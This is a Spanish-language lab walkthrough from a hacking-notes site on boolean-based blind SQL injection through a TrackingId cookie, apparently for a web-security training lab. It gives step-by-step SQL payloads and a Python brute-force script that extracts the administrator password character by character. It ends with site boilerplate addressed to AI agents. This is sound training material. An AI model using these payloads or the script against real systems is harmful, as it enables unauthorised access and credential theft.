> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/sql-injection/blind-sql-injection-with-conditional-responses.md).

# Inyección SQL ciega con respuestas condicionales

### Inyección SQL ciega con respuestas condicionales

**Contexto / vulnerabilidad:** el valor de una cookie de seguimiento (`TrackingId`) se inyecta en una consulta SQL del lado del servidor. La consulta no devuelve directamente ningún resultado ni errores, pero la página muestra **"¡Bienvenido de nuevo!"** si la consulta devuelve al menos una fila. Esto permite una **inyección SQL ciega basada en condiciones** (basada en booleanos): probamos afirmaciones verdaderas/falsas y observamos la presencia/ausencia del mensaje para extraer datos.

**Objetivo del laboratorio:** extraer la contraseña del `administrator` usuario e iniciar sesión como administrador.

#### Técnica (fases clave y cargas útiles)

1. **Pruebas básicas de estabilidad / columnas**

   ```sql
   ' ORDER BY 1-- -
   ' ORDER BY 2-- -
   ```

* (puede detectar el comportamiento de error si resulta útil)

<figure><img src="/files/e021f30934102f5ee6ddaea73e15e87b1b643ab8" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/33d939130adecdeb522f2d7db2fd190f60cc08ae" alt=""><figcaption></figcaption></figure>

2. **Verificación de una condición verdadera/falsa (control de cadena de fallo)**

   ```sql
   ' AND (SELECT 'a') = 'a'-- -
   ' AND (SELECT 'a') = 'b'-- -
   ```

* el primero debe activar `¡Bienvenido de nuevo!`, el segundo no debe hacerlo.

3. **Comprobar la existencia de un `administrator` token de usuario**

   ```sql
   ' AND (SELECT 'a' FROM users WHERE username='administrator') = 'a'-- -
   ```

* si `¡Bienvenido de nuevo!` aparece, la subconsulta devolvió una fila.

4. **Extraer carácter por carácter (subcadenas)**

* \*\*Nombre de usuario (p. ej.) \*\*

  ````
   ```sql
   ' AND (SELECT SUBSTRING(username,1,1) FROM users WHERE username='administrator') = 'a'-- -
   ```
  ````
* \*\*Contraseña (p. ej.) \*\*

  ````
   ```
   ' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator') = 'a'-- -
   ```
  ````

iterar posiciones/valores para reconstruir la cadena. 5. \*\*Encontrar la longitud (ejemplo: probar longitud = 20) \*\*

````
```sql
' AND (SELECT SUBSTRING(username,1,1) FROM users WHERE username='administrator' AND LENGTH(password)=20) = 'a'-- -
```

adáptalo según el DBMS (`LENGTH` / `LEN` / `LENGTH()`).
````

### Script de automatización (Python)

" El script proporcionado automatiza un ataque de fuerza bruta carácter por carácter modificando la `TrackingId` cookie.

```sql
from pwn import *
import requests, signal, time, pdb, sys, string

def def_handler(sig, frame):
    print("/nSaliendo.../n")
    sys.exit(1)

# Ctrl + C
signal.signal(signal.SIGINT, def_handler)

main_url = "https://0ac1002b042e505b810c253d007c0076.web-security-academy.net/"
characters = string.printable

def makeRequest():

    password = ""

    p1 = log.progress("Fuerza bruta")
    p1.status("Iniciando ataque de fuerza bruta")
    time.sleep(2)

    p2 = log.progress("Contraseña")

    for position in range(1, 21):
        for character in characters:

            cookies = {
                'TrackingId': f"lRU8Ekyqctl6Yr6A' and (select substring(password,{position},1) from users where username='administrator')='{character}",
                'Session': 'zAVTpTyb3sYA5keYIro3aDUqsp6h780H'
            }
            p1.status(cookies['TrackingId'])
            try:
                r = requests.get(main_url, cookies=cookies)
                if "¡Bienvenido de nuevo!" in r.text:
                    password += character
                    p2.status(password)
                    break
            except requests.exceptions.RequestException as e:
                p1.failure(f"La solicitud falló: {e}")
                sys.exit(1)

if __name__ == '__main__':
    makeRequest()
```

<figure><img src="/files/b9529185ae2615d10d353bfca558c25c640f9729" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/sql-injection/blind-sql-injection-with-conditional-responses.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
